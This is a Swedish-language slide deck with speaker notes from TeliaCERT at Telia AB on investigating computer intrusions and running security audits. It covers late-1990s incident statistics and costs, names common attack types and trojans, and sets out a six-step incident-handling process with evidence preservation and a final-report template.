76
1 Telia AB Erfarenheter vid dataintrång och IT-säkerhetskontroller TeliaCERT CC Telefon/fax: 08-713 1872/2657 E-post: [email protected] URL: http://www.t-cert.telia.se

Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

  • Upload
    others

  • View
    5

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

1

Telia AB

Erfarenheter viddataintrång ochIT-säkerhetskontroller

TeliaCERT CCTelefon/fax: 08-713 1872/2657

E-post: [email protected]: http://www.t-cert.telia.se

Page 2: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

2

Telia AB

Agenda

u Inledningu Utreda säkerhetsincidenter (intrång)u Utföra säkerhetskontroller

u Checklistor

u Sårbarhetskontrolleru Penetrationstester

u Trenderu Överbelastningsattacker

Page 3: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

3

Telia AB

Statistik

1994 1996 1997 1998

CERT CC 2241 2573 2134 3734

EuroCERT - - 1450 2800

TeliaCERT - 50 1700 400

FBI 500 2500 3000 4000

Det finns idag inga exakta uppgifter på hur många dataintrång som sker. Viss statistik finnshos brottsutredande myndigheter, säkerhetsorganisationer och Internetleverantörerna, mendenna är inte heltäckande då den enbart avser de brott som anmälts. Många drar sig för attanmäla intrångsförsök eller dataintrång på grund av att det kan ge dåligt rykte.

Det görs dock årligen undersökningar av FBI och Computer Security Institute avseende IT-relaterade brott. I den senaste rapporteras att 163 företag förlorade 984 miljoner kronor[CSIFBI99]. Samma undersökning visar att antalet dataintrång från utomstående ökar förtredje året. Närmare 30% av de som svarade hade råkat ut för ett dataintrång och 57%anmälde att attacken kom via deras Internetuppkoppling. För svenska förhållanden finnsRiksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samtBrottsförebyggande Rådets rapport om "IT-relaterad brottslighet" [BRÅ-00:2]. Båda visaratt den IT-relaterade brottsligheten ökar från till år.

I februari 1999 räknade tidningen InternetWorld att mer än 40 000 datorer hade blivitsmittade av trojanska hästar som NetBus och BackOrifice [InternetWorld, nr 2, 1999].Dessa datorer tillhör till största delen privatpersoner men även företag har drabbats. Blandannat fick en revisionsbyrå sin klientdatabas stulen. Telia rapporterar att de undervintermånaderna 1998/99 tog emot uppemot 150 anmälningar i månaden där angriparenanvänt Netbus eller Back Orifice [InternetWorld, nr 3, 1999].

Page 4: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

4

Telia AB

Vad kostar en incident?

u RRV-97 549 KSEK 70 KSEKu CSI & FBI-98 990 MSEK 1,6 MSEKu NCC-97 99 KSEK 160 KSEKu ICAMP-95 270 KSEKu BRÅ-00 356 KSEK

Incidentkostnad Dataintrång

De kostnader som förknippas med ett dataintrång blir tyvärr väldigt höga. Detta beror påden tid det tar att sanera systemen, d.v.s. gå igenom operativsystem och applikationer för attsöka efter eventuella bakvägar, trojanska hästar och logisk bomber.

Engelska undersökningar visar att genomsnittskostnaden för att komma tillrätta med ettdataintrång ligger på mellan 30 000 kr - 160 000 kr [NCC92, AC94]. I Sverige harEffektivitetsrevisionen på Riksförsäkringsverket utfört en undersökning om datarelateradebrott hos svenska företag och organisationer under 1997. De redovisargenomsnittskostnaden är 549 000 kr för databrott (exkl. virus och stöld av hårdvara)[RRV33-97]. Genomsnittskostnaden för dataintrång är ca 70 000 kr. Dock har enbart enfemtedel av de som svarat kunna ange eventuella kostnader. Denna kostnad är betydligtlägre än vad övriga undersökningar redovisar. Varje år utför Computer Security Instituteoch FBI undersökning om IT-relaterade incidenter. De rapporterar attgenomsnittskostnaden för ett dataintrång är 1.6 MSEK [CSIFBI98]. Den genomsnittligakostnaden för dataintrång var 1992 över 3000£, 1994 över 16 000£

I rapporten ”Incident Cost Analysis and Modeling Project” [CICSWG] har man analyserat30 olika dataintrång. De rapporterar följande arbetsinsatser att komma till rätta med dessaincidenter:

§210 personer arbetade över 9078 timmar

§antalet drabbade datorsystem uppskattades till 270 805 system

§saneringskostnaden var 8.2 MSEK

Detta ger en genomsnittlig kostnad vid dataintrång på ca 270 000 kr.

Page 5: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

5

Telia AB

Typer av hackerattacker

u Packet sniffing (tcpmon, gobbler)

u Knäcka lösenord (NT/W95)

u Brister i system (felkonfiguration, exploits)

u Protokoll-baserade attacker (Waterfall, ftp, chargen)

u Tillgänglighetsattacker (Smurf, Bo(i)nk, (New)Tear)

u War dialing (ToneLoc, PhoneTag, BlueBeep)

u Social engineeringu Distribuerade tillgänglighetsattacker

Det har blivit allt vanligare att trojanska hästar öppnar upp vägar in i system. Dessa haralltid funnits men har under det senaste året blivit ”var mans egendom”, t.ex. genomNetbus, Back Orifice, Donald Dick, Sub7 m.fl.

Avsökning av system och nätverk sker i syfte att fastställa vilka typer av tjänster som finnstillgängliga samt programtyp och version. Utifrån dessa uppgifter kan man sedankontrollera om dessa är sårbara för någon känd säkerhetsbrist. Dessa brister finnspublicerade på webbplatser som bl.a. www.securityfocus.com, www.insecure.org,www.ntbugtraq.com

Olika typer av avsökningar används för olika syften:

•network mapping för att kartlägga nätverket och dess arkitektur

•probing för att samla information om system och nätverk

•portscanning för att kontrollera vilka tjänster som finns tillgängliga på system

•cgi-scanning för att söka efter brister i webbserverns cgi-tjänster

Page 6: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

6

Telia AB

Kunder installerar patchi sina system

Distribuerar patchSkapar olika nationella varianter (NT)

Testar patchförpackar i servicepack eller hotfix

Leverantör läser bugtraqSkapar patch

Script-KiddiesAnvänder verktyget i volym

Sprider verktyget allmänt

Nyttjar verktyget inom egna gruppen

"Ond" Hacker läser bugtraqBygger verktyg kring exemplet

Postar på BugTraq(mejlinglista)

"God" HackerHittar brist i pgmGör exempelkod

< 1v

~ 2v

~ 2 - 3v

2v - ∞

< 1v

~1- 5 v

< 1v

1v - ∞

CERTADV

En säkerhetsbrist liv och leverne

Brister hittas kontinuerligt i operativsystem och systemprogramvara.Efter release av en produkt från en leverantör kommer den att vara under Internetsargusögon.Hur hittas då dessa brister? Detta är ett flöde på hur detta kan ske.

1) Intresserade ’hackers’ som genomför tester, dels genom djupa studier av källkod menäven massiva tester med ’elak’ program mot programmen. Det hittar någon typ av brist.Beroende på om hackern är godhjärtat eller ’ond’ kan ett antal saker inträffa.Vi utgår från att han är ’god’.

Postning sker på Bugtraq, eventuellt en signal till CERT och kansk även leverantören.

Efter denna publicering sker ofta parallella aktiviteter, dels hos leverantören, men också hosden ’onda’ undergroundkulturen.

Leverantören har en fix som distribueras inom 1 månad.

Hur lång tid det tar till den är inför hos alla vet ingen!

Hackerkulturen har samtidigt byggt ett verktyg som ger ’vem som helst’ möjlighet attutnyttja den givna bristen.

Page 7: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

7

Telia AB

UTREDA IT-SÄKERHETSINCIDENTER(Dataintrång)

Inom företag och organisationer saknas det oftast rutiner för hur man ska hantera IT-säkerhetsinciden-ter. Om dessa upptäcks hanteras de ’ad hoc’, negligeras eller avskrives dåman inte vet vart man ska vända sig för att anmäla händelsen och inte vet var man kan fåhjälp.

I vissa företag och organisationer finns det flera olika enheter som tar emot anmälningar omIT-relate-rade incidenter, t.ex. Helpdesk, driftsupport, kundtjänst, säkerhetsavdelning. Omdessa enheter inte är samverkande kan detta ge flera problem avseende rapportering ochhantering, bl.a. att anmälningar utreds från två olika enheter, ovetande om varandrasrutiner, dels att anmälningar faller mellan stolarna.

Orsaken till dessa problem är bl.a. avsaknaden av en klar definition av termer och begreppsamt förankring av roller. Dessutom gör avsaknaden av en etablerad och accepterad enhetdit IT-säkerhetsinci-denter rapporteras, att man inte vet hur den verkliga bilden ser utavseende inträffade IT-säkerhets-incidenter, om de har inrapporterats, hur de har hanteratsoch vilka kostnader som uppstått.

Genom att inom företaget och organisationer strukturera organisationen förincidenthantering och etablera rutiner för att ta emot anmälningar, hantera och samordnaIT-säkerhetsincidenter erhålls en:

•enhet som kan bistå med kompetens och erfarenhet som rådgivare eller deltagaresamt samordning vid utredning av IT-säkerhetsincidenter

•enhet som snabbt och effektivt hjälper till att stoppa och begränsa skadorna avIT-säkerhetsinci-denter samt minska sannolikheten att samma IT-säkerhetsincidentinträffar igen

•samordnande enhet som underlättar för kunder och andra intressenter att komma ikontakt med rätt enhet inom företaget eller vice versa, t.ex. kontakter medpolisväsendet, Internetleverantörer (ISP) och säkerhetsgrupperingar som CERT

Detta är några av de resultat som kan uppnås. En av de viktigare är dock de signaler ensnabb och effektiv hantering ger till anställda och eventuellt externt involverade parter.

Page 8: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

8

Telia AB

6 grundbalkar

1. Förberedelser2. Identifiera incidenten3. Stoppa och begränsa konsekvenserna4. Analysera och eliminera orsakerna5. Återställning6. Uppföljning

Källa: NSWC Dahlgren Computer Security Incident Handling Procedure (http://all.net)

De rutiner som beskrivs i SANS Institutes incidenthanteringsplan [SANSIH99]. Dessarutiner de kan användas som "ledstjärna". Rutinerna består av 5 steg, nämligen:

§Kvalificering av vilken typ av säkerhetsincident rör det sig om

§Begränsa skadeverkningar och stoppa skeendet

§Bekämpa orsaken till att detta kunde inträffa och förbättra för attförhindra en återupprepning

§Återställande till normal verksamhet

§Uppföljning och återkoppling

Page 9: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

9

Telia AB

Förberedelser

u Förhindra att incidenter inträffaru Regler och riktlinjer (IT-säkerhetspolicy)u Anvisningar och checklistor

u Säkra systemen och externa kopplingar

u Följa upp loggfileru Ordning och reda (ex. dokumenterat nätverk- och systemmiljö)

u Hålla sig à jouru Säkerhetsbrister, uppdateringar, nyheter

Förberedelse

Det bästa sättet att förhindra säkerhetsincidenter är att se till att de inte kan inträffa. Etthjälpmedel för detta är att ha enkla regler och riktlinjer, aktiverade säkerhetsfunktioner,följa upp loggfiler och analysera system- och nätverksanvändning samt hålla sigunderrättad om säkerhetsbrister och uppdatera system när så krävs.

Genom att ha fastställda regler hur företagets system och information får användas samtvad som kan hända om dessa regler överskrides, kan man få en god grund att byggaföretagets moraliska anda.

Användande av kontrollistor, s.k. Besiktningsprotokoll för system, kan man skapa engemensam säkerhetsnivå för systemen. Dessa checklistor används även för att upprätthållasäkerheten, dvs man gör återkommande kontroller.

Någon måste hålla sig à jour med vad som händer, nya säkerhetsbrister, nya rättningar, nyahackerverktyg m.m. Har man kännedom om detta finns det förutsättningar att förhindraonödiga säkerhetsincidenter/dataintrång bara för att man glömt att patcha systemen.

Page 10: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

10

Telia AB

Identifiera incidenten

u Utse ansvarigu Kvalificera händelsenu Bedöm omfattning

u skadeanalys

u konsekvensanalysu Finns temporär lösning

u Säkerställ loggfileru Meddela ansvariga

Identifikation

När en säkerhetsincident inrapporteras ska en ansvarig utses. Denna persons första uppgiftär att kvalificera säkerhetsincidenten huruvida det är en säkerhetsincident och desskonsekvenser. SANS Institute rekommenderar att denna person bör ha ett helhetsperspektivoch arbeta för hela organisationen.

Det händer med jämna mellanrum att en inrapporterad säkerhetsincident inte är något annatän ett misstag, t.ex. en systemadministratör har slagit in fel IP-adress eller systemnamn,felkonfigurering, tolkat loggfiler fel m.m.

Genom att fastställa omfattningen av säkerhetsincidenten får man en indikation på vilkendel av organisationen och vilka användare som berörs av säkerhetsincidenten samt desskonsekvenser. Bedömningen av omfattningen kan göras i två delar, nämligen:

•skadeanalys, som visar på vilka system, nätverk, applikationer och tjänster somdrabbats

•konsekvensanalys, som ger en indikation på vad detta innebär för organisationen, vad etteventuellt driftstopp på drabbade system innebär och kostar, vad är värdet på informationoch hur kan organisationens image påverkas

Det kan även vara så att säkerhetsincidenten även berör organisationer, grupper ellerpersoner utanför den egna organisationen. I detta fall måste man göra en initial bedömningom och hur dessa påverkas. Man måste även bedöma hur den egna verksamheten ochimage kan påverkas när kontakt tas med drabbade leverantörer, kunder och andraaffärskontakter.

Det är viktigt att på ett tidigt stadium säkerställa loggfiler, resultat från kommandon ochinspelade sessioner, etc. Dessa kan komma att användas som bevis i en eventuell rättsligprövning. Det insamlade materialet måste kunna ge en obruten kedja av bevis som kanbinda en eventuell person vid händelsen.

När man konstaterat omfattning och konsekvens samt gjort en initial bedömning omeventuell snabb- eller temporär lösning bör man söka kontakt med ansvarig. Detta kan varaenhetschef, systemägare, IT-säkerhetschef och affärsansvarig. Detta bör följa denkontaktlista man upprättat tidigare.

Page 11: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

11

Telia AB

Grund-kontroll

Då man undersöker system och nätverk är det nödvändigt att inte avslöja att man upptäcktoch förstått situationen. Om det är en säkerhetsincident, t.ex. ett dataintrång, som ärpågående är det mindre bra att röja sina närvaro. Detta kan förvarna eller skrämmainkräktaren så att han försvinner, radera sina spår eller förstör systemen.

Undvik att spåra från det drabbade systemet eller system som tillhör den drabbade enheten.Använd istället ett system som är fristående eller som en unik adress skild från övriga.Detta för att inte inkräktaren, om han är paranoid och har satt upp larm, ska varnas attnågon på hans mål har upptäckt honom.

Undvik att söka efter spår och framför allt nätverkskopplingar med kommandon som röjerdig. Undvik om möjligt ping, telnet, nslookup, finger m.fl ”högljudda” kommandon.

Var noga att hålla dig inom organisationens systemgränser. Det är väldigt lätt attengagerade medarbetare undersöker system och nätverk som inte tillhör den drabbadeorganisationen och på så sätt kan göra sig skyldig till oegentligheter och eventuelltdataintrång.

Samla data enligt fastställda rutiner

Följ de fastställda rutiner som finns för incidenthantering samt för att kontrollera system-och nätsäkerhet.

Page 12: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

12

Telia AB

Karakteristika

Det man vill få indikationer på kan vara omincidenter:u är återkommandeu drabbar, utlöses eller upptäcks av samma

person eller avdelningu omständigheter kring incidenteru inträffar på speciella tider eller datum

Identifikation

Det man vill få indikationer på kan vara om incidenter:

•är återkommande

•drabbar, utlöses eller upptäcks av samma person eller funktion

•omständigheter kring incidenter

•inträffar på speciella tider eller datum

All denna information kan användas för att klargöra om incidenter kan orsakas av oklarainstruktioner eller otillräcklig utbildning hos användare och handläggare, om det inträffarpå tidpunkter på dygnet då man är trött och mindre uppmärksam, m.m.

Page 13: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

13

Telia AB

Stoppa och begränsa

u Etablera [temporär] incidentgrupp samt genomgångu Håll en låg profil. Starta inga krig!u Fastställ och undvik använda ev. förändrade program,

kod etcu Säkerhetskopiering av drabbade system

u Observera och samla data enligt fastställda rutiner

Stoppa & begränsa

Den ansvariga utser en incidentledare som ska leda incidentgruppens arbete. Medlemmarnai incidentgruppen ska utses. Oftast är flera av dessa självskrivna såsom representation frånett Computer Security Incident Response Team (CSIRT), teknisk och ev. administrativpersonal från den drabbade enheten, beslutsfattare m.fl.

Alla ska även föra en incidentdagbok. Detta är speciellt viktigt för incidentledaren men börföras av alla deltagare i incidentgruppen. I denna noteras vem som har sagt vad och tillvem, dels inom gruppen och dels ut från gruppen samt andra iakttagelser och teorier.Negativa spår och ovanliga händelser bör även noteras. För alla noteringar ska äventidpunkt noteras. Dessa kan användas för att i efterhand rekonstruera olika skeenden ochhändelseförlopp.

Man bör undersöka om det finns någon snabb eller temporär lösning påsäkerhetsincidenten. Detta måste vägas mot den bedömning som gjordes i förra punkten.

Om säkerhetsincidenten kan åtgärdas genom en snabb och effektiv lösning som inte harstörre konsekvenser. Det kan t.ex. vara att blockera en IP-adress, tjänst, applikation ellersystem.

Page 14: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

14

Telia AB

Incidentgruppen

u Beslut om ansatsu Slänga ut ev. inkräktareu Hålla kvar och övervaka hans/hennes mått och steg, samla bevis

u Koppla från/separera drabbade systemu Byt lösenord, sätt ut ev. fällor etc

u Dubbelkolla erhållen informationu Håll drabbad miljö ”orörd”u Håll en låg profil

u Använd fastställda rutiner

Stoppa & begränsa

Ett av de svårare besluten är vad som ska göras med drabbade system. Det som står tillbuds är att, efter bedömning av insamlad information, stänga av systemet, koppla systemetfrån nätverket, isolera systemet i nätverket och tillåta att systemet ”lever vidare”.

Beslutet beror naturligtvis på en mängd omständigheter som t.ex. vad det drabbadesystemet används till och informationens värde och klassificering, kostnader för eventuelldriftstopp, tillgänglighetskrav från användare, policy.

Om organisationens policy eller om incidentledare beslutat att man ska försöka fångainkräktaren eller samla mera information till bevisning, kan man sätta upp fällor, s.k.honeypots. Detta är separata system som innehåller fabricerade uppgifter som kan betraktassom intressanta av inkräktaren.

Honeypots har använts i flera kända fall och de har haft väldigt bra utdelning. I samtligafall har man lyckats att samla mera information och bevis om inkräktaren samt man harlyckats hålla inkräktaren ”online” tillräckligt länge för att utföra en telefonispårning.

Det finns flera beskrivningar hur man bör sätta upp honeypots, hur dessa kan konfigurerasoch administreras samt hur man ”föder” den med intressant information. Det är ingen trivialuppgift att hålla intresset vid liv hos en eventuell inkräktare. För mera information om fällorrekommenderas Fred Cohens verktyg Deception Toolkit, DTK (http://all.net).

Page 15: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

15

Telia AB

Analysera och elimineraorsakerna

u Fastställ orsak och symptomen av incidentenu Eliminera orsakerna till incidentenu Förbättra säkerhetsskyddetu Säkerhetskontroll, verifiera nätverket och

närliggande systemu Fastställ senaste ”friska” backup

Stoppa & begränsa

Ett av incidentgruppens arbetsuppgifter är att fastställa hur det inträffade kunde ske. Omman inte får kunskap om hur säkerhetsincidenten emanerade kan man inte åtgärda denna.

Det kan ibland vara svårt att fastställa exakt hur vilken angreppsmetod som använts. I dessafall kan man ranka de mest troliga och vidta åtgärder för att förhindra en återupprepning.

Säkerhetsbristen i det drabbade systemet kan ha varit känd en längre tid och informationom denna spridits och fortsatt att spridas efter det att säkerhetsincidenten upptäckts ochåtgärdats. Detta gör att det kan pågå försök till att använda den ”kända” säkerhetsbristenflera veckor efter ”sanering” för att få åtkomst till det aktuella systemet.

Dessutom ska man räkna med fortsatta försök att använda den aktuella säkerhetsbristen,kartläggningar (scans/probes) samt andra säkerhetsbrister.

Genom att förbättra säkerhetsskyddet på det drabbade systemet och system i dess närhetkan man undvika nya säkerhetsincidenter. Man bör ha större uppmärksamhet på loggfileroch nätverksaktiviteter en tid efter incidenten för att upptäcka och förhindra eventuellaåterbesök.

Efter att säkerhetsskyddet förbättrats bör detta verifieras. Även närliggande system ochnätverk bör kontrolleras. Detta kan göras med kommersiella verktyg, egna uppdateradechecklistor samt manuella metoder.

Naturligtvis ska man kontrollera systemet avseende närbesläktade säkerhetsbrister.

Page 16: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

16

Telia AB

Utredningsprinciper

u Korrektu Trovärdigu Komplettu Tidsriktig (samtida)u Kontrollerad form

Utredning av databrott ställer stora krav på utredande enhet. De måste kunna analyserafallet och måste ta hänsyn till brottets art, bevisning, utredningskostnader och möjlighetertill åtal. Det är ingen hemlighet att de flesta som döms för dataintrång i Sverige enbart harfått dagsböter. För att lyckas med en utredning måste man följa ovanstående punkter:• korrekt utförd (dvs handlingsplan och åtgärdslista är att föredra så att man inte missarnågot), trovärdig då inget ska undantas som är relevant för utredningen•Den ska vara komplett med loggar och annan bevisning.•Tidsriktigheten innebär att man ska kunna påvisa en händelsekedja som håller. Utan dennakan det vara mycket svårt att gå iland med utredningen.•Till slut ska utredningen hanteras och dokumenteras i en kontrollerad form.

Utredarna måste kunna göra en initial bedömning av brottet om det ens lönt att utreda. Detär flera faktorer som påverkar denna bedömning.

Det anmälda brottet kan vara svårt att precisera. Detta märks väl i anstormningen avpolisanmälningar där målsägaren utsatts för dataintrång via programmet Netbus. I de fall dåmålsägaren själv har lyckats spåra angriparen har man använt programmet Netbuster. Dettaprogram öppnar upp och publicerar en tjänst för omvärlden, precis som en webbserver. Omen angripare kopplar upp sig mot den publicerade porten så loggas uppkopplingen. Detviktiga med Netbuster är att den stoppar angriparen och kan ge ut falsk information.Angriparen tillåts alltså inte att komma in i datorn. Detta är då inget dataintrång utan enbartett försök därtill. Huruvida det kan hålla för åtal när man medvetet sätter upp en tjänståterstår att prövas.

Brottet kan var utfört på ett tekniskt avancerat sätt att så att det kan vara svårt att förklaraför personer som ej har gedigna kunskaper inom IT-området. Detta ska ställas mot detfaktum att de flesta nämndemän inte har någon grundläggande datautbildning och kan tilloch med vara motståndare och rädda för tekniken.

Utredarnas arbetsbelastning kanske inte klarar ett omfattande utredningsarbete och manavvaktar i väntan på mera resurser.

Svag bevisningen gör att utredningen inte drivs vidare då man inte ser att bevisningen hållerför ett åtal.

När utredningen är klar kanske målsägaren drar tillbaka sin anmälan, dels på grund av denrisk för publicitet om polisanmälan görs, dels på grund av att man är rädd för brottetupprepas.

Page 17: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

17

Telia AB

Informationsinsamling

u Vem ska söka (extern/intern expert)?u Vad söker vi efter?u När ska vi söka?u Var är det?u Hur kan vi finna det?u Varför söker vi efter det?

Handlingsplanen för hantera säkerhetsincidenter ska ge verksamheten stöd för införande avskyddsåtgärder för förhindra och minimera de skador som kan uppkomma i samband medeventuella säkerhetsincidenter. Dessutom ska den visa på hur självaincidenthanteringsgruppen ska arbeta. Detta kan innefatta explicita steg, t.ex. vad man skaleta efter, var det kan finnas, användbara åtgärder och kommandon.

Garfinkel och Spafford rekommenderar 2 viktiga åtgärder. Det första är att behålla lugnetoch inte hetsa upp sig eller råka i panik. Det kan låta fånigt men då jag kom på eninkräktare i mitt system var det något som verkligen fick mitt blod att rusa och adrenalinetgick i höjden. Naturligtvis gjorde jag fel i upphetsningen för jag ”nukade honom” ochförsvann ;-) innan jag hann undersöka vilka filer han hade inspekterat och eventuellt laddathem. Jag hann dock ta hans ”fotspår” så jag vet var han kom ifrån.

Den andra viktiga åtgärdern är att dokumentera allt. Det som inte finns på papper har intehänt. Det är väldigt viktigt för utredningen att allt är dokumenterat i rätt tidsordning, vemsom gjorde vad och vem som sa vad. Utan denna dokumentation kan hela bevisningen bliverkningslös.

Tyvärr är det så att det är först efter man själv har drabbats av en incident som man börjarfundera på att upprätta en handlingsplan vid säkerhetsincidenter.

Page 18: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

18

Telia AB

Bevarande

u Identifiering (tydliga referenser)

u Dokumentation (vad och varför gjorde vi detta?)

u Beviskedjan (vad är förövarens syfte ochtillvägagångssätt - hur fungerar det i ”normal”läge?)

u Säkerhet (förvara på betryggande sätt)

I Sverige har vi fri bevisprövning.Brottsutredande myndighet avgör bevisets värde

I USA krävs att åberopat bevismaterial hanteras på korrekt sätt. Man måste kunna verifieraatt bevisen är korrekta, tillförlitliga och trovärdiga. Normalt är bevis som anses varahörsägen inte godtagbara, men det finns några undantag. För att dessa ska kunna användas irätten måste bevismaterialet vara:

•en naturlig del i den dagliga verksamheten, d.v.s. de får inte vara skapade enbartför rättegången

•vidimerade av något trovärdigt vittne som påvisar att bevismaterialet är trovärdigtoch korrekt

•originalmaterial, d.v.s. det får inte vara kopior eller sammansatta kopior

Det gäller även att de som samlar in och säkerställer ev. bevismaterial har tillräckligkunskap för att kunna verifiera att den interna utredningen och insamling av bevis har skettpå ett yrkesmässigt sätt. Annars finns det stor risk att bevismaterialet inte anses vara korrektoch trovärdigt. Samma principer anses gälla i Sverige.

I Sverige har vi fri bevisprövning. Målsägaren kan avgöra vad som kan räknas sombevismaterial men brottsutredande myndighet prövar dessa. De avgör hur viktigt ett bevisär och hur det kan användas. Skulle man inte vara tillfreds med deras värdering avbevismaterial kan man överklaga till åklagaren och därefter till överåklagare.

Detta gör det än viktigare att förklara händelseförloppet, den brottsliga gärningen och hurman leder detta till bevis. Presentationen för att få förståelse är A och O.

Intressant information är uppkopplingstider och hur länge, tillfällen då e-posttjänstenanvänds, i vissa fall själva e-brev, e-brevlistor och chatloggar, historik och cookie-filersamt lagringsmedia.

Loggfiler från operativsystem, och i vissa fall applikationsloggar, anses vara trovärdiga.

Page 19: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

19

Telia AB

Återställning

u Återläs senast ”friska” backupu Återställ system och applikationeru Konfigurera system, applikation och säkerhetu Validera systemetu Produktionssättningu Övervaka

Återställ

Det är viktigt att inte återläsa säkerhetskopior som kan innehålla den användasäkerhetsbristen eller andra komprometterade program eller enheter. Om man är nödd tillatt göra detta måste man sanera systemet, uppdatera operativsystem, nätverkskomponenteroch applikationer med senaste fungerande version. Därefter bör man göra en validering avsystemet för att kontrollera att det fungerar som det ska och att säkerheten har acceptabelnivå.

Efter återställning ska system och applikationer konfigureras så att minst sammasäkerhetsnivå uppnås som man hade innan säkerhetsincidenten. Därefter börsäkerhetsskyddet förbättras.

Efter att säkerhetsskyddet förbättrats bör detta verifieras. Även närliggande system ochnätverk bör kontrolleras. Detta kan göras med kommersiella verktyg, egna uppdateradechecklistor samt manuella metoder.

Naturligtvis ska man kontrollera systemet avseende närbesläktade säkerhetsbrister.

Återigen, det är viktigt att ha större uppmärksamhet på loggfiler och nätverksaktiviteter entid efter incidenten för att upptäcka och förhindra eventuella återbesök samt för kontroll attman inte glömt att stänga eller korrigera eventuella bakdörrar.

Page 20: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

20

Telia AB

Uppföljning

u Ta fram en slutrapportu Incidentledaren är dokumentansvarigu Starta snarast efter incidentarbetet

u Använd mall på nästa sidau Hela incidentgruppen ska deltaga/få remissu Försök nå konsensus

u Summera på max 1 sida

u ”Vad har vi lärt oss”-möteu Gå igenom slutrapport

u Fånga upp ”eftertankar”

Uppföljning

Det är nödvändigt för den fortsatta verksamhet att säkerhetsincidenter och incidentgruppensarbete följs upp. Detta har flera orsaker och det främsta är för att kunna göra ett bättrearbete nästa gång en säkerhetsincident inträffar.

En uppföljningsrapport kan påvisa att förändringar måste genomföras inom t.ex.:

•rapporteringsrutiner

•ansvarsfördelning

•samverkanformer

•samordning, insatser och återrapportering till incidentledare beslutsvägar

Man bör utvärdera händelsen och dess hantering för att ge återkoppling till ledning,säkerhetsfunktion, driftenhet m.fl.

Denna utvärdering/återkoppling visar bl.a. på hur upptäckten skedde, tidsrymd mellanupptäckt och åtgärd, vidtagna åtgärder och dess effektivitet samt resultat. Dessutom skaman redovisa eventuellt upptäckta brister ursprunglig miljö, brister i hantering och rutinersamt återföra detta till en erfarenhetsbank. Även indirekta och direkta kostnader börredovisas.

Page 21: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

21

Telia AB

Uppföljning

u 1. Sammanfattning

u 2. Utredningshistoriku 3. Omfattning

u 4. Åtgärder4.1 Incidenthantering

u 4.1.1 Utförda åtgärderu 4.1.2 Ej utförda åtgärder

4.2 Säkerhetshöjande åtgärder4.3 Långsiktiga åtgärder

Uppföljning

• 5. Erfarenheter och noteringar5.1 Utredningssvårigheter5.2 Roller och ansvar5.3 Säkring av spår5.4 Att få fram uppgifter5.5 Obekräftade uppgifter5.6 Ev. polisanmälan

• 6. Ersättningskrav6.1 Våra kostnader6.2 Externa kostnadskrav6.3 Våra skadeståndskrav

• 7. Rekommendationer

Slutrapporten kan innehålla:

De flesta är behjälpliga med en beskrivning, eller dokumentmall som visar hur ensäkerhetsincident kan dokumenteras. En rapport avseende en säkerhetsincident kaninnehålla följande rubriker:

•Incident- och brottsrubricering

•Gärningsbeskrivning med omfattning, konsekvens, teknisk nivå, m.m.

